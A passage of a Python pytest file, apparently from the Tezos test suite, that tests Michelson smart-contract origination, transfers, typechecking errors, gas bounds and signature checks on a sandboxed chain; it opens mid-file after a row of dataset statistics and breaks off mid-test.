# ; PAIR ; CAR %faa }' of type 'lambda unit unit'" and
# replacing the two last bytes (that correspond to the two
# 'a's at the end of the annotation) by the 0xff byte which is
# not a valid UTF8-encoding of a string
parameter = '0x05020000000e034f03420416000000042566ffff'
res = client.run_script(contract, 'None', parameter)
assert res.storage == 'None'
@pytest.mark.contract
class TestOrderInTopLevelDoesNotMatter:
@pytest.fixture
def contract_splitted_in_top_level_elements(self):
return [
"parameter nat",
"storage unit",
"code { CDR; NIL operation; PAIR }",
]
def test_shuffle(
self, client: Client, contract_splitted_in_top_level_elements
):
"""
Test that the storage, code, and parameter sections can appear in any
order in a contract script.
"""
for shuffled_list in itertools.permutations(
contract_splitted_in_top_level_elements
):
contract = ";\n".join(shuffled_list)
client.typecheck(contract, file=False)
@pytest.mark.contract
@pytest.mark.regression
class TestSelfAddressTransfer:
def test_self_address_originate_sender(
self, client_regtest_scrubbed, session
):
client = client_regtest_scrubbed
path = os.path.join(
CONTRACT_PATH, 'mini_scenarios', 'self_address_sender.tz'
)
originate(client, session, path, 'Unit', 0)
def test_self_address_originate_receiver(
self, client_regtest_scrubbed, session
):
client = client_regtest_scrubbed
path = os.path.join(
CONTRACT_PATH, 'mini_scenarios', 'self_address_receiver.tz'
)
originate(client, session, path, 'Unit', 0)
session['receiver_address'] = session['contract']
def test_send_self_address(self, client_regtest_scrubbed, session):
client = client_regtest_scrubbed
receiver_address = session['receiver_address']
client.transfer(
0,
'bootstrap2',
'self_address_sender',
['--arg', f'"{receiver_address}"', '--burn-cap', '2'],
)
utils.bake(client, 'bootstrap5')
@pytest.mark.slow
@pytest.mark.contract
@pytest.mark.regression
class TestScriptHashRegression:
@pytest.mark.parametrize("contract", all_contracts())
def test_contract_hash(self, client_regtest: Client, contract):
client = client_regtest
assert contract.endswith(
'.tz'
), "test contract should have .tz extension"
client.hash_script(os.path.join(CONTRACT_PATH, contract))
@pytest.mark.contract
class TestScriptHashOrigination:
def test_contract_hash_with_origination(
self, client: Client, session: dict
):
script = 'parameter unit; storage unit; code {CAR; NIL operation; PAIR}'
originate(
client,
session,
contract=script,
init_storage='Unit',
amount=1000,
contract_name='dummy_contract',
)
hash1 = client.hash_script(script)
hash2 = client.get_script_hash('dummy_contract')
assert hash1 == hash2
@pytest.mark.contract
@pytest.mark.regression
class TestNormalize:
"""Regression tests for the "normalize data" command."""
modes = [None, 'Readable', 'Optimized', 'Optimized_legacy']
@pytest.mark.parametrize('mode', modes)
def test_normalize_unparsing_mode(self, client_regtest_scrubbed, mode):
client = client_regtest_scrubbed
input_data = (
'{Pair 0 3 6 9; Pair 1 (Pair 4 (Pair 7 10)); {2; 5; 8; 11}}'
)
input_type = 'list (pair nat nat nat nat)'
client.normalize(input_data, input_type, mode=mode)
def test_normalize_legacy_flag(self, client_regtest_scrubbed):
client = client_regtest_scrubbed
input_data = '{Elt %a 0 1}'
input_type = 'map nat nat'
client.normalize(input_data, input_type, legacy=True)
error_pattern = 'unexpected annotation.'
with utils.assert_run_failure(error_pattern):
client.normalize(input_data, input_type, legacy=False)
@pytest.mark.parametrize('mode', modes)
def test_normalize_script(self, client_regtest_scrubbed, mode):
client = client_regtest_scrubbed
path = os.path.join(CONTRACT_PATH, 'opcodes', 'comb-literals.tz')
client.normalize_script(path, mode=mode)
types = [
'nat',
'list nat',
'pair nat int',
'list (pair nat int)',
'pair nat int bool',
'list (pair nat int bool)',
'pair nat int bool bytes',
'list (pair nat int bool bytes)',
]
@pytest.mark.parametrize('typ', types)
def test_normalize_type(self, client_regtest_scrubbed, typ):
client = client_regtest_scrubbed
client.normalize_type(typ)
| 36.746164 | 80 | 0.58071 | import os
import re
import json
import itertools
from typing import List, Union, Any
import pytest
from client.client import Client
from tools import utils
from tools.constants import IDENTITIES
from .contract_paths import (
CONTRACT_PATH,
ILLTYPED_CONTRACT_PATH,
all_contracts,
all_legacy_contracts,
)
def file_basename(path):
return os.path.splitext(os.path.basename(path))[0]
def originate(
client,
session,
contract,
init_storage,
amount,
contract_name=None,
sender='bootstrap1',
baker='bootstrap5',
arguments=None,
):
if contract_name is None:
contract_name = file_basename(contract)
args = ['--init', init_storage, '--burn-cap', '10.0']
if arguments is not None:
args += arguments
origination = client.originate(
contract_name, amount, sender, contract, args
)
session['contract'] = origination.contract
print(origination.contract)
utils.bake(client, baker)
assert utils.check_block_contains_operations(
client, [origination.operation_hash]
)
return origination
@pytest.mark.contract
@pytest.mark.incremental
class TestManager:
def test_manager_origination(self, client: Client, session: dict):
path = os.path.join(CONTRACT_PATH, 'entrypoints', 'manager.tz')
pubkey = IDENTITIES['bootstrap2']['identity']
originate(client, session, path, f'"{pubkey}"', 1000)
originate(
client, session, path, f'"{pubkey}"', 1000, contract_name="manager2"
)
def test_delegatable_origination(self, client: Client, session: dict):
path = os.path.join(
CONTRACT_PATH, 'entrypoints', 'delegatable_target.tz'
)
pubkey = IDENTITIES['bootstrap2']['identity']
originate(
client, session, path, f'Pair "{pubkey}" (Pair "hello" 45)', 1000
)
def test_target_with_entrypoints_origination(self, client: Client, session):
path = os.path.join(
CONTRACT_PATH, 'entrypoints', 'big_map_entrypoints.tz'
)
originate(
client, session, path, 'Pair {} {}', 1000, contract_name='target'
)
def test_target_without_entrypoints_origination(
self, client: Client, session
):
path = os.path.join(
CONTRACT_PATH, 'entrypoints', 'no_entrypoint_target.tz'
)
originate(
client,
session,
path,
'Pair "hello" 42',
1000,
contract_name='target_no_entrypoints',
)
def test_target_without_default_origination(self, client: Client, session):
path = os.path.join(
CONTRACT_PATH, 'entrypoints', 'no_default_target.tz'
)
originate(
client,
session,
path,
'Pair "hello" 42',
1000,
contract_name='target_no_default',
)
def test_target_with_root_origination(self, client: Client, session):
path = os.path.join(CONTRACT_PATH, 'entrypoints', 'rooted_target.tz')
originate(
client,
session,
path,
'Pair "hello" 42',
1000,
contract_name='rooted_target',
)
def test_manager_set_delegate(self, client: Client):
client.set_delegate('manager', 'bootstrap2', [])
utils.bake(client, 'bootstrap5')
bootstrap2_pkh = IDENTITIES['bootstrap2']['identity']
client.set_delegate('delegatable_target', bootstrap2_pkh, [])
utils.bake(client, 'bootstrap5')
delegate = IDENTITIES['bootstrap2']['identity']
assert client.get_delegate('manager', []).delegate == delegate
assert (
client.get_delegate('delegatable_target', []).delegate == delegate
)
client.set_delegate('manager', 'bootstrap3', [])
utils.bake(client, 'bootstrap5')
client.set_delegate('delegatable_target', 'bootstrap3', [])
utils.bake(client, 'bootstrap5')
delegate = IDENTITIES['bootstrap3']['identity']
assert client.get_delegate('manager', []).delegate == delegate
assert (
client.get_delegate('delegatable_target', []).delegate == delegate
)
def test_manager_withdraw_delegate(self, client: Client):
client.withdraw_delegate('manager', [])
utils.bake(client, 'bootstrap5')
client.withdraw_delegate('delegatable_target', [])
utils.bake(client, 'bootstrap5')
assert client.get_delegate('manager', []).delegate is None
assert client.get_delegate('delegatable_target', []).delegate is None
def test_transfer_to_manager(self, client: Client):
balance = client.get_mutez_balance('manager')
balance_bootstrap = client.get_mutez_balance('bootstrap2')
amount = 10.001
amount_mutez = utils.mutez_of_tez(amount)
client.transfer(
amount,
'bootstrap2',
'manager',
['--gas-limit', f'{128 * 15450 + 108}'],
)
utils.bake(client, 'bootstrap5')
new_balance = client.get_mutez_balance('manager')
new_balance_bootstrap = client.get_mutez_balance('bootstrap2')
fee = 0.000548
fee_mutez = utils.mutez_of_tez(fee)
assert balance + amount_mutez == new_balance
assert (
balance_bootstrap - fee_mutez - amount_mutez
== new_balance_bootstrap
)
def test_simple_transfer_from_manager_to_implicit(self, client: Client):
balance = client.get_mutez_balance('manager')
balance_bootstrap = client.get_mutez_balance('bootstrap2')
amount = 10.1
amount_mutez = utils.mutez_of_tez(amount)
client.transfer(
amount,
'manager',
'bootstrap2',
['--gas-limit', f'{128 * 26350 + 12}'],
)
utils.bake(client, 'bootstrap5')
new_balance = client.get_mutez_balance('manager')
new_balance_bootstrap = client.get_mutez_balance('bootstrap2')
fee = 0.000794
fee_mutez = utils.mutez_of_tez(fee)
assert balance - amount_mutez == new_balance
assert (
balance_bootstrap + amount_mutez - fee_mutez
== new_balance_bootstrap
)
def test_transfer_from_manager_to_manager(self, client: Client):
balance = client.get_mutez_balance('manager')
balance_dest = client.get_mutez_balance('manager2')
balance_bootstrap = client.get_mutez_balance('bootstrap2')
amount = 10
amount_mutez = utils.mutez_of_tez(amount)
client.transfer(
amount,
'manager',
'manager2',
['--gas-limit', f'{128 * 44950 + 112}'],
)
utils.bake(client, 'bootstrap5')
new_balance = client.get_mutez_balance('manager')
new_balance_dest = client.get_mutez_balance('manager2')
new_balance_bootstrap = client.get_mutez_balance('bootstrap2')
fee = 0.001124
fee_mutez = utils.mutez_of_tez(fee)
assert balance_bootstrap - fee_mutez == new_balance_bootstrap
assert balance - amount_mutez == new_balance
assert balance_dest + amount_mutez == new_balance_dest
def test_transfer_from_manager_to_default(self, client: Client):
client.transfer(
10, 'manager', 'bootstrap2', ['--entrypoint', 'default']
)
utils.bake(client, 'bootstrap5')
client.transfer(10, 'manager', 'manager', ['--entrypoint', 'default'])
utils.bake(client, 'bootstrap5')
def test_transfer_from_manager_to_target(self, client: Client):
client.transfer(10, 'manager', 'target', ['--burn-cap', '0.356'])
utils.bake(client, 'bootstrap5')
def test_transfer_from_manager_to_entrypoint_with_args(
self, client: Client
):
arg = 'Pair "hello" 42'
client.transfer(
0,
'manager',
'target',
['--entrypoint', 'add_left', '--arg', arg, '--burn-cap', '0.067'],
)
utils.bake(client, 'bootstrap5')
client.transfer(
0,
'manager',
'target',
['--entrypoint', 'mem_left', '--arg', '"hello"'],
)
utils.bake(client, 'bootstrap5')
client.call(
'manager',
'target',
['--entrypoint', 'add_left', '--arg', arg, '--burn-cap', '0.067'],
)
utils.bake(client, 'bootstrap5')
client.call(
'manager',
'target',
['--entrypoint', 'mem_left', '--arg', '"hello"'],
)
utils.bake(client, 'bootstrap5')
def test_transfer_from_manager_no_entrypoint_with_args(
self, client: Client
):
arg = 'Left Unit'
client.transfer(0, 'manager', 'target_no_entrypoints', ['--arg', arg])
utils.bake(client, 'bootstrap5')
client.call('manager', 'target_no_entrypoints', ['--arg', arg])
utils.bake(client, 'bootstrap5')
def test_transfer_from_manager_to_no_default_with_args(
self, client: Client
):
arg = 'Left Unit'
client.transfer(0, 'manager', 'target_no_default', ['--arg', arg])
utils.bake(client, 'bootstrap5')
client.call('manager', 'target_no_default', ['--arg', arg])
utils.bake(client, 'bootstrap5')
def test_transfer_from_manager_to_rooted_target_with_args(
self, client: Client
):
arg = 'Left Unit'
client.transfer(
0,
'manager',
'rooted_target',
['--arg', arg, '--entrypoint', 'root'],
)
utils.bake(client, 'bootstrap5')
client.call(
'manager', 'rooted_target', ['--arg', arg, '--entrypoint', 'root']
)
utils.bake(client, 'bootstrap5')
def test_transfer_json_to_entrypoint_with_args(self, client):
balance = client.get_mutez_balance('manager')
balance_bootstrap = client.get_mutez_balance('bootstrap2')
fee = 0.0123
fee_mutez = utils.mutez_of_tez(fee)
json_obj = [
{
"destination": "target",
"amount": "0",
"fee": str(fee),
"gas-limit": "65942",
"storage-limit": "1024",
"arg": 'Pair "hello" 42',
"entrypoint": "add_left",
}
]
json_ops = json.dumps(json_obj, separators=(',', ':'))
client.run(client.cmd_batch('manager', json_ops))
utils.bake(client, 'bootstrap5')
new_balance = client.get_mutez_balance('manager')
new_balance_bootstrap = client.get_mutez_balance('bootstrap2')
assert balance == new_balance
assert balance_bootstrap - fee_mutez == new_balance_bootstrap
def test_multiple_transfers(self, client):
balance = client.get_mutez_balance('manager')
balance_bootstrap2 = client.get_mutez_balance('bootstrap2')
balance_bootstrap3 = client.get_mutez_balance('bootstrap3')
amount_2 = 10.1
amount_mutez_2 = utils.mutez_of_tez(amount_2)
amount_3 = 11.01
amount_mutez_3 = utils.mutez_of_tez(amount_3)
json_obj = [
{"destination": "bootstrap2", "amount": str(amount_2)},
{"destination": "bootstrap3", "amount": str(amount_3)},
]
json_ops = json.dumps(json_obj, separators=(',', ':'))
client.run(client.cmd_batch('manager', json_ops))
utils.bake(client, 'bootstrap5')
new_balance = client.get_mutez_balance('manager')
new_balance_bootstrap2 = client.get_mutez_balance('bootstrap2')
new_balance_bootstrap3 = client.get_mutez_balance('bootstrap3')
fee_mutez = 794 + 698
assert balance - amount_mutez_2 - amount_mutez_3 == new_balance
assert (
balance_bootstrap2 + amount_mutez_2 - fee_mutez
== new_balance_bootstrap2
)
assert balance_bootstrap3 + amount_mutez_3 == new_balance_bootstrap3
# In DFS, Storer will end up with storage ABC.
@pytest.mark.contract
@pytest.mark.incremental
class TestExecutionOrdering:
STORER = f'{CONTRACT_PATH}/mini_scenarios/execution_order_storer.tz'
CALLER = f'{CONTRACT_PATH}/mini_scenarios/execution_order_caller.tz'
APPENDER = f'{CONTRACT_PATH}/mini_scenarios/execution_order_appender.tz'
def originate_storer(self, client: Client, session: dict):
origination = originate(
client, session, self.STORER, '""', 0, arguments=['--force']
)
session['storer'] = origination.contract
utils.bake(client, 'bootstrap3')
return origination.contract
def originate_appender(
self, client: Client, session: dict, storer: str, argument: str
):
origination = originate(
client,
session,
self.APPENDER,
f'Pair "{storer}" "{argument}"',
0,
contract_name=f'appender-{argument}',
arguments=['--force'],
)
session[f'appender.{argument}'] = origination.contract
utils.bake(client, 'bootstrap3')
return origination.contract
def originate_caller(
self, client: Client, session: dict, callees: List[str]
):
storage = "{" + '; '.join(map('"{}"'.format, callees)) + "}"
origination = originate(
client,
session,
self.CALLER,
storage,
0,
contract_name=f'caller-{hash(storage)}',
)
utils.bake(client, 'bootstrap3')
return origination.contract
@pytest.mark.parametrize(
"tree, expected",
[
# before 009, the result should be "DABCEFG".
([["A", "B", "C"], "D", ["E", "F", "G"]], "ABCDEFG"),
# before 009, the result should be "ACB".
([["A", ["B"], "C"]], "ABC"),
# before 009, the result should be "ABDC".
([["A", ["B", ["C"], "D"]]], "ABCD"),
([], ""),
],
)
def test_ordering(
self,
client: Client,
session: dict,
# approximation of recursive type annotation
tree: Union[str, List[Any]],
expected: str,
):
storer = self.originate_storer(client, session)
def deploy_tree(tree: Union[str, List[Any]]) -> str:
# leaf
if isinstance(tree, str):
# deploy and return caller str
return self.originate_appender(client, session, storer, tree)
# inner node
children = list(map(deploy_tree, tree))
return self.originate_caller(client, session, children)
root = deploy_tree(tree)
client.transfer(
0,
'bootstrap2',
root,
["--burn-cap", "5"],
)
utils.bake(client, 'bootstrap3')
assert client.get_storage(storer) == '"{}"'.format(expected)
@pytest.mark.slow
@pytest.mark.contract
class TestContracts:
@pytest.mark.parametrize("contract", all_contracts())
def test_typecheck(self, client: Client, contract):
assert contract.endswith(
'.tz'
), "test contract should have .tz extension"
client.typecheck(os.path.join(CONTRACT_PATH, contract))
@pytest.mark.parametrize("contract", all_legacy_contracts())
def test_deprecated_typecheck_breaks(self, client, contract):
if contract in [
"legacy/create_contract.tz",
"legacy/create_contract_flags.tz",
"legacy/create_contract_rootname.tz",
]:
with utils.assert_run_failure(r'ill-typed script'):
client.typecheck(os.path.join(CONTRACT_PATH, contract))
else:
with utils.assert_run_failure(r'Use of deprecated instruction'):
client.typecheck(os.path.join(CONTRACT_PATH, contract))
@pytest.mark.parametrize("contract", all_legacy_contracts())
def test_deprecated_typecheck_in_legacy(self, client, contract):
if contract in [
"legacy/create_contract.tz",
"legacy/create_contract_flags.tz",
"legacy/create_contract_rootname.tz",
]:
with utils.assert_run_failure(r'ill-typed script'):
client.typecheck(
os.path.join(CONTRACT_PATH, contract), legacy=True
)
else:
with utils.assert_run_failure(r'Use of deprecated instruction'):
client.typecheck(
os.path.join(CONTRACT_PATH, contract), legacy=True
)
@pytest.mark.parametrize(
"contract,error_pattern",
[
# operations cannot be PACKed
(
"pack_operation.tz",
r'operation type forbidden in parameter, storage and constants',
),
# big_maps cannot be PACKed
(
"pack_big_map.tz",
r'big_map or sapling_state type not expected here',
),
(
"invalid_self_entrypoint.tz",
r'Contract has no entrypoint named D',
),
("contract_annotation_default.tz", r'unexpected annotation'),
# Missing field
(
"missing_only_storage_field.tz",
r'Missing contract field: storage',
),
("missing_only_code_field.tz", r'Missing contract field: code'),
(
"missing_only_parameter_field.tz",
r'Missing contract field: parameter',
),
(
"missing_parameter_and_storage_fields.tz",
r'Missing contract field: parameter',
),
# Duplicated field
(
"multiple_parameter_field.tz",
r'duplicate contract field: parameter',
),
("multiple_code_field.tz", r'duplicate contract field: code'),
("multiple_storage_field.tz", r'duplicate contract field: storage'),
# The first duplicated field is reported, storage in this case
(
"multiple_storage_and_code_fields.tz",
r'duplicate contract field: storage',
),
# error message for set update on non-comparable type
(
"set_update_non_comparable.tz",
r'Type nat is not compatible with type list operation',
),
# error message for the arity of the chain_id type
(
"chain_id_arity.tz",
r'primitive chain_id expects 0 arguments but is given 1',
),
# error message for DIP over the limit
("big_dip.tz", r'expected a positive 10-bit integer'),
# error message for DROP over the limit
("big_drop.tz", r'expected a positive 10-bit integer'),
# error message for set update on non-comparable type
(
"set_update_non_comparable.tz",
r'Type nat is not compatible with type list operation',
),
# error message for attempting to push a value of type never
("never_literal.tz", r'type never has no inhabitant.'),
# field annotation mismatch with UNPAIR
(
"unpair_field_annotation_mismatch.tz",
r'The field access annotation does not match',
),
# COMB, UNCOMB, and DUP cannot take 0 as argument
("comb0.tz", r"PAIR expects an argument of at least 2"),
("comb1.tz", r"PAIR expects an argument of at least 2"),
("uncomb0.tz", r"UNPAIR expects an argument of at least 2"),
("uncomb1.tz", r"UNPAIR expects an argument of at least 2"),
("dup0.tz", r"DUP n expects an argument of at least 1"),
(
"push_big_map_with_id_with_parens.tz",
r"big_map or sapling_state type not expected here",
),
(
"push_big_map_with_id_without_parens.tz",
r"primitive PUSH expects 2 arguments but is given 4",
),
# sapling_state is not packable
(
"pack_sapling_state.tz",
r"big_map or sapling_state type not expected here",
),
# sapling_state is not packable
(
"unpack_sapling_state.tz",
r"big_map or sapling_state type not expected here",
),
# Ticket duplication attempt
("ticket_dup.tz", r'DUP used on the non-dupable type ticket nat'),
# error message for ticket unpack
("ticket_unpack.tz", r'Ticket in unauthorized position'),
# error message for attempting to use APPLY to capture a ticket
("ticket_apply.tz", r'Ticket in unauthorized position'),
# error message for attempting to wrap a ticket in a ticket
(
"ticket_in_ticket.tz",
r'comparable type expected.Type ticket unit is not comparable',
),
],
)
def test_ill_typecheck(self, client: Client, contract, error_pattern):
with utils.assert_run_failure(error_pattern):
client.typecheck(os.path.join(ILLTYPED_CONTRACT_PATH, contract))
def test_zero_transfer_to_implicit_contract(self, client):
pubkey = IDENTITIES['bootstrap3']['identity']
err = (
'Transaction of 0ꜩ towards a contract without code are '
rf'forbidden \({pubkey}\).'
)
with utils.assert_run_failure(err):
client.transfer(0, 'bootstrap2', 'bootstrap3', [])
def test_zero_transfer_to_nonexistent_contract(self, client):
nonexistent = "KT1Fcq4inD44aMhmUiTEHR1QMQwJT7p2u641"
err = rf'Contract {nonexistent} does not exist'
with utils.assert_run_failure(err):
client.transfer(0, 'bootstrap2', nonexistent, [])
FIRST_EXPLOSION = '''
{ parameter unit;
storage unit;
code{ DROP; PUSH nat 0 ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DROP ; UNIT ; NIL operation ; PAIR} }
'''
# FIRST_EXPLOSION costs a large amount of gas just for typechecking.
# FIRST_EXPLOSION_BIGTYPE type size exceeds the protocol set bound.
FIRST_EXPLOSION_BIGTYPE = '''
{ parameter unit;
storage unit;
code{ DROP; PUSH nat 0 ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DROP ; UNIT ; NIL operation ; PAIR} }
'''
SECOND_EXPLOSION = '''
{ parameter (list int) ;
storage (list (list (list int))) ;
code { CAR ; DIP { NIL (list int) } ;
DUP ; ITER { DROP ; DUP ; DIP { CONS } } ;
DROP ; DIP { NIL (list (list int)) } ;
DUP ; ITER { DROP ; DUP ; DIP { CONS } } ;
DROP ; NIL operation ; PAIR } }
'''
@pytest.mark.contract
class TestGasBound:
def test_write_contract(self, tmpdir, session: dict):
items = {
'first_explosion.tz': FIRST_EXPLOSION,
'first_explosion_bigtype.tz': FIRST_EXPLOSION_BIGTYPE,
'second_explosion.tz': SECOND_EXPLOSION,
}.items()
for name, script in items:
contract = f'{tmpdir}/{name}'
with open(contract, 'w') as contract_file:
contract_file.write(script)
session[name] = contract
def test_originate_first_explosion(self, client: Client, session: dict):
name = 'first_explosion.tz'
contract = session[name]
client.typecheck(contract)
args = ['-G', f'{1870}', '--burn-cap', '10']
expected_error = "Gas limit exceeded during typechecking or execution"
with utils.assert_run_failure(expected_error):
client.originate(f'{name}', 0, 'bootstrap1', contract, args)
def test_originate_big_type(self, client: Client, session: dict):
name = 'first_explosion_bigtype.tz'
contract = session[name]
# We could not be bothered with finding how to escape parentheses
# so we put dots
expected_error = "type size .1023. exceeded maximum type size .1000."
with utils.assert_run_failure(expected_error):
client.typecheck(contract)
def test_originate_second_explosion(self, client: Client, session: dict):
name = 'second_explosion.tz'
contract = session[name]
storage = '{}'
inp = '{1;2;3;4;5;6;7;8;1;1;1;1;1;1;1;1;1;1;1;1;1;1;1;1;1;1;1;1;1;1}'
client.run_script(contract, storage, inp)
def test_originate_second_explosion_fail(
self, client: Client, session: dict
):
name = 'second_explosion.tz'
contract = session[name]
storage = '{}'
inp = (
'{1;2;3;4;5;6;7;8;9;0;1;2;3;4;5;6;7;1;1;1;1;1;1;1;1;1;1;1'
+ ';1;1;1;1;1;1;1;1;1;1;1;1;1;1}'
)
expected_error = (
"Cannot serialize the resulting storage"
+ " value within the provided gas bounds."
)
with utils.assert_run_failure(expected_error):
client.run_script(contract, storage, inp, gas=9290)
def test_typecheck_map_dup_key(self, client: Client):
expected_error = (
'Map literals cannot contain duplicate'
+ ' keys, however a duplicate key was found'
)
with utils.assert_run_failure(expected_error):
client.typecheck_data('{ Elt 0 1 ; Elt 0 1}', '(map nat nat)')
def test_typecheck_map_bad_ordering(self, client: Client):
expected_error = (
"Keys in a map literal must be in strictly"
+ " ascending order, but they were unordered in literal"
)
with utils.assert_run_failure(expected_error):
client.typecheck_data(
'{ Elt 0 1 ; Elt 10 1 ; Elt 5 1 }', '(map nat nat)'
)
def test_typecheck_set_bad_ordering(self, client: Client):
expected_error = (
"Values in a set literal must be in strictly"
+ " ascending order, but they were unordered in literal"
)
with utils.assert_run_failure(expected_error):
client.typecheck_data('{ "A" ; "C" ; "B" }', '(set string)')
def test_typecheck_set_no_duplicates(self, client: Client):
expected_error = (
"Set literals cannot contain duplicate values,"
+ " however a duplicate value was found"
)
with utils.assert_run_failure(expected_error):
client.typecheck_data('{ "A" ; "B" ; "B" }', '(set string)')
@pytest.mark.contract
class TestChainId:
def test_chain_id_opcode(self, client: Client, session: dict):
path = os.path.join(CONTRACT_PATH, 'opcodes', 'chain_id.tz')
originate(client, session, path, 'Unit', 0)
client.call('bootstrap2', "chain_id", [])
utils.bake(client, 'bootstrap5')
def test_chain_id_authentication_origination(self, client: Client, session):
path = os.path.join(
CONTRACT_PATH, 'mini_scenarios', 'authentication.tz'
)
pubkey = IDENTITIES['bootstrap1']['public']
originate(client, session, path, f'Pair 0 "{pubkey}"', 1000)
utils.bake(client, 'bootstrap5')
def test_chain_id_authentication_first_run(
self, client: Client, session: dict
):
destination = IDENTITIES['bootstrap2']['identity']
operation = (
'{DROP; NIL operation; '
+ f'PUSH address "{destination}"; '
+ 'CONTRACT unit; ASSERT_SOME; PUSH mutez 1000; UNIT; '
+ 'TRANSFER_TOKENS; CONS}'
)
chain_id = client.rpc('get', 'chains/main/chain_id')
contract_address = session['contract']
packed = client.pack(
f'Pair (Pair "{chain_id}" "{contract_address}") '
+ f'(Pair {operation} 0)',
'pair (pair chain_id address)'
+ '(pair (lambda unit (list operation)) nat)',
)
signature = client.sign_bytes_of_string(packed, "bootstrap1")
client.call(
'bootstrap2',
'authentication',
['--arg', f'Pair {operation} \"{signature}\"'],
)
utils.bake(client, 'bootstrap5')
@pytest.mark.contract
class TestBigMapToSelf:
def test_big_map_to_self_origination(self, client: Client, session: dict):
path = os.path.join(CONTRACT_PATH, 'opcodes', 'big_map_to_self.tz')
originate(client, session, path, '{}', 0)
utils.bake(client, 'bootstrap5')
def test_big_map_to_self_transfer(self, client: Client):
client.call('bootstrap2', "big_map_to_self", [])
utils.bake(client, 'bootstrap5')
client.transfer(0, 'bootstrap2', "big_map_to_self", [])
utils.bake(client, 'bootstrap5')
@pytest.mark.contract
class TestNonRegression:
def test_issue_242_originate(self, client: Client, session: dict):
path = os.path.join(CONTRACT_PATH, 'non_regression', 'bug_262.tz')
originate(client, session, path, 'Unit', 1)
def test_issue_242_assert_balance(self, client: Client):
assert client.get_balance('bug_262') == 1
@pytest.mark.contract
class TestMiniScenarios:
# replay.tz related tests
def test_replay_originate(self, client: Client, session: dict):
path = os.path.join(CONTRACT_PATH, 'mini_scenarios', 'replay.tz')
originate(client, session, path, 'Unit', 0)
def test_replay_transfer_fail(self, client: Client):
with utils.assert_run_failure("Internal operation replay attempt"):
client.transfer(10, "bootstrap1", "replay", [])
# create_contract.tz related tests
def test_create_contract_originate(self, client: Client, session: dict):
path = os.path.join(
CONTRACT_PATH, 'mini_scenarios', 'create_contract.tz'
)
originate(client, session, path, 'Unit', 1000)
def test_create_contract_balance(self, client: Client):
assert client.get_balance('create_contract') == 1000
def test_create_contract_perform_creation(self, client: Client):
transfer_result = client.transfer(
0,
"bootstrap1",
"create_contract",
['-arg', 'None', '--burn-cap', '10'],
)
utils.bake(client, 'bootstrap5')
pattern = r"New contract (\w*) originated"
match = re.search(pattern, transfer_result.client_output)
assert match is not None
kt_1 = match.groups()[0]
assert client.get_storage(kt_1) == '"abcdefg"'
assert client.get_balance(kt_1) == 100
assert client.get_balance('create_contract') == 900
# Originates a contract that when called, creates a contract with a
# rootname annotation. Such annotations comes in two flavors, thus the
# parameterization. Then calls the first contract and verifies the
# existence and type of the root entrypoint of the create contract.
@pytest.mark.parametrize(
"contract",
[
'create_contract_rootname.tz',
'create_contract_rootname_alt.tz',
],
)
def test_create_contract_rootname_originate(
self, client: Client, session: dict, contract
):
path = os.path.join(CONTRACT_PATH, 'opcodes', contract)
origination_res = originate(client, session, path, 'None', 1000)
transfer_result = client.transfer(
0,
"bootstrap1",
origination_res.contract,
['-arg', 'Unit', '--burn-cap', '10'],
)
utils.bake(client, 'bootstrap5')
pattern = r"New contract (\w*) originated"
match = re.search(pattern, transfer_result.client_output)
assert match is not None
kt_1 = match.groups()[0]
entrypoint_type = client.get_contract_entrypoint_type(
'root', kt_1
).entrypoint_type
assert entrypoint_type == 'unit', (
'the entrypoint my_root of the originated contract should exist'
'with type unit'
)
# default_account.tz related tests
def test_default_account_originate(self, client: Client, session: dict):
path = os.path.join(
CONTRACT_PATH, 'mini_scenarios', 'default_account.tz'
)
originate(client, session, path, 'Unit', 1000)
def test_default_account_transfer_then_bake(self, client: Client):
tz1 = IDENTITIES['bootstrap4']['identity']
client.transfer(
0,
"bootstrap1",
"default_account",
['-arg', f'"{tz1}"', '--burn-cap', '10'],
)
utils.bake(client, 'bootstrap5')
account = 'tz1SuakBpFdG9b4twyfrSMqZzruxhpMeSrE5'
client.transfer(
0,
"bootstrap1",
"default_account",
['-arg', f'"{account}"', '--burn-cap', '10'],
)
utils.bake(client, 'bootstrap5')
assert client.get_balance(account) == 100
# Test bytes, SHA252, CHECK_SIGNATURE
def test_reveal_signed_preimage_originate(
self, client: Client, session: dict
):
path = os.path.join(
CONTRACT_PATH, 'mini_scenarios', 'reveal_signed_preimage.tz'
)
byt = (
'0x9995c2ef7bcc7ae3bd15bdd9b02'
+ 'dc6e877c27b26732340d641a4cbc6524813bb'
)
sign = 'p2pk66uq221795tFxT7jfNmXtBMdjMf6RAaxRTwv1dbuSHbH6yfqGwz'
storage = f'(Pair {byt} "{sign}")'
originate(client, session, path, storage, 1000)
def test_wrong_preimage(self, client: Client):
byt = (
'0x050100000027566f756c657a2d766f75732'
+ '0636f75636865722061766563206d6f692c20636520736f6972'
)
sign = (
'p2sigvgDSBnN1bUsfwyMvqpJA1cFhE5s5oi7SetJ'
+ 'VQ6LJsbFrU2idPvnvwJhf5v9DhM9ZTX1euS9DgWozVw6BTHiK9VcQVpAU8'
)
arg = f'(Pair {byt} "{sign}")'
# We check failure of ASSERT_CMPEQ in the script.
with utils.assert_run_failure("At line 8 characters 9 to 21"):
client.transfer(
0,
"bootstrap1",
"reveal_signed_preimage",
['-arg', arg, '--burn-cap', '10'],
)
def test_wrong_signature(self, client: Client):
byt = (
'0x050100000027566f756c657a2d766f757320636'
+ 'f75636865722061766563206d6f692c20636520736f6972203f'
)
sign = (
'p2sigvgDSBnN1bUsfwyMvqpJA1cFhE5s5oi7SetJVQ6'
+ 'LJsbFrU2idPvnvwJhf5v9DhM9ZTX1euS9DgWozVw6BTHiK9VcQVpAU8'
)
arg = f'(Pair {byt} "{sign}")'
# We check failure of CHECK_SIGNATURE ; ASSERT in the script.
with utils.assert_run_failure("At line 15 characters 9 to 15"):
client.transfer(
0,
"bootstrap1",
"reveal_signed_preimage",
['-arg', arg, '--burn-cap', '10'],
)
def test_good_preimage_and_signature(self, client: Client):
byt = (
'0x050100000027566f756c657a2d766f757320636f7563'
+ '6865722061766563206d6f692c20636520736f6972203f'
)
sign = (
'p2sigsceCzcDw2AeYDzUonj4JT341WC9Px4wdhHBxbZcG1F'
